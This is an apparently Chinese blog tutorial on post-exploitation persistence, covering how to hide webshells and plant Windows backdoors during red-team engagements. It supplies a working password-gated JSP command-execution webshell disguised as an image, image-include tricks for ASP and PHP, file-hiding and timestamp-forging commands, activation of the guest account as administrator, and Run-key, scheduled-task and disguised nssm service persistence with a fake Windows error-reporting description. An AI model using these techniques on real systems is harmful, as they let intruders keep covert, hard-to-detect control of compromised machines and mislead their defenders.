前言
之前写过一篇《后渗透之权限维持》,但在实战中可用性不强。本着简单、方便的原则重新总结了一下,但是隐蔽性也不是很完美,这里分为webshell的隐藏和windows后门隐藏两个部分。实战中可轻松上手。
webshell隐藏
隐藏文件
attrib +r +s +h webshell.php
r 表示文件只读属性
s 表示系统文件属性
h 表示隐藏文件属性
放置位置
在通过上传、命令执行或其他姿势成功种植webshell后,选择移动webshell到其他路径。路径可选择以下不易被发现的文件夹。
plugin
tmp
logs
css
js
area
document
images
languages
templates
文件命名
webshell不要命名shell、xiaoma、payload等敏感字符命名。
以php为例,可以命名为
xxx.add.php
xxx.tpl.php
xxx.type.php
xxx_backup.php
xxx.inc.php
xxx.import.php
xxx.select.php
xxx_left.php
xxx.bak.php
xxx.api.php
xxx.class.php
xxx_link.php
图片马
用include包含图片马的方式是绕过防护的有效方式,同时也是隐藏后门的一种方法。
asp的图片包含
<!--#include file="images.jpg"-->
php的文件包含
<?php
include('images.jpg');
?>
jsp的图片包含
<%@ include file="include.png"%>
包含图片include.png代码如下:
<% out.print("this is include png"); %>
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
访问可正常解析小马。
image.png
修改webshell时间
powershell可以一条命令修改文件的创建、修改、访问时间。
在powershell环境下运行以下命令:
(ls shell.php).LastAccessTimeUtc="2019-12-10 22:33:44"
修改访问时间
(ls shell.php).LastWriteTimeUtc="2019-10-10 11:22:33"
修改修改时间
(ls shell.php).CreationTimeUtc="2019-10-09 14:00:01"
修改创建时间
windows系统后门
木马放置
windows木马同样需要移动到别的路径来隐藏。可以考虑放在:
C:\Windows\System32\
C:\Windows\Temp\
C:\Users\Administrator\AppData\Local\
C:\Users\Administrator\AppData\Local\Temp\
木马命名也应该规避一下:
auto
boot
api
calcc
device
event
error
firewall
gpapis
helps
激活guest
激活guest至少比新建用户隐蔽一些吧。
net user guest 1234qwer..
net loaclgroup administrators guest /add
注册表自启
和metepreter的persistence启动项后门原理一样。在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下新建一个开机启动项。
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\Windows\Temp\back.exe"
image.png
重启后以普通权限可自动上线。
image.png
计划任务
schtasks 命令每小时定时执行一次calc.exe,命令为
schtasks /Create /tn Updater /tr calc.exe /sc hourly /mo 1
image.png
系统服务
可以使用nssm 来安装服务。
nssm install 启动nssm
nssm remove 移除服务
设置描述为:
允许程序捕捉异常错误,停止响应时报告错误,并允许提供现有解决方案。如果此服务被停止,则错误报告将无法正确运行,而且可能不显示诊断服务和修复的结果。
image.png
image.png
安装成功后,可看到winderror名称的服务。
image.png
重启后以system权限CS可正常上线。
image.png
总结
HW是不可能HW的。
网友评论